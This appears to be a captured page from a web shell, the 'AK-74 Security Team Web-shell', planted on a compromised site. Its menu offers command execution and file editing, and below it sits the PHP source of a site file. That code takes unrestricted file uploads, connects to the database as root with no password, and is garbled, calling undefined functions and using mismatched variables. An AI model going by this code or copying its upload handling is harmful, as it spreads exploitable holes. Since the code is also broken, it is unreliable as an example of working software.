.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
<form method="post" enctype="multipart/form-data"> Please choose a file: <input type="file" name="uploadFile"> <input type="submit" value="delete iemi"> </form> <?php if (!empty($_FILES["uploadFile"]["name"])) { $target_dir = "maillist/"; $target_dir = $target_dir . basename($_FILES["uploadFile"]["name"]); $uploadOk = 1; if (move_uploaded_file($_FILES["uploadFile"]["tmp_name"], $target_dir)) { //echo "The file " . basename($_FILES["uploadFile"]["name"]) . " has been uploaded."; $file = fopen($target_dir, 'r') or die($php_errormsg); $mails = array(); while (!feof($file)) { $r = fgets($file); $mails[] = $r; } fclose($file); $mails = array_filter($mails, 'strlen'); $num = count($mails); if (empty($mails[$num - 1])) unset($mails[$num - 1]); foreach ($mails as $mail) { // var_dump($mail); $mail = trim($mail); // var_dump($mail); // $mail=trim($text); $con = mysqli_connect("localhost", "root", "", "gs"); if (clearObjectHistory($mail)) echo "history is cleared for $mails <br>"; if (delObjectSystem($mail)) echo "object is cleared for $mails <br>"; } echo "objects is cleared <br>"; } } function sendmail($mail) { $message = '<table height="848" width="600"> <tr><a href="http://saudiex.com.sa" target="_blank"><img src="http://saudiex.com.sa/images-server/ramadan.png" style="padding-left: 60px; padding-top: 60px;" ></a></tr> </table>'; // CHANGE THE BELOW VARIABLES TO YOUR NEEDS $to = $mail; $subject = 'كل عام انتم بخير '; $headers = "From: info@saudiex.com\r\n"; $headers .= "Reply-To:info@saudiex.com\r\n"; $headers .= "MIME-Version: 1.0\r\n"; $headers .= "Content-Type: text/html; charset=ISO-8859-1\r\n"; if (mail($to, $subject, $message, $headers)) { echo 'Your message has been sent.'; } else { echo 'There was a problem sending the email.'; } // DON'T BOTHER CONTINUING TO THE HTML... die(); } ?>
Rename:
-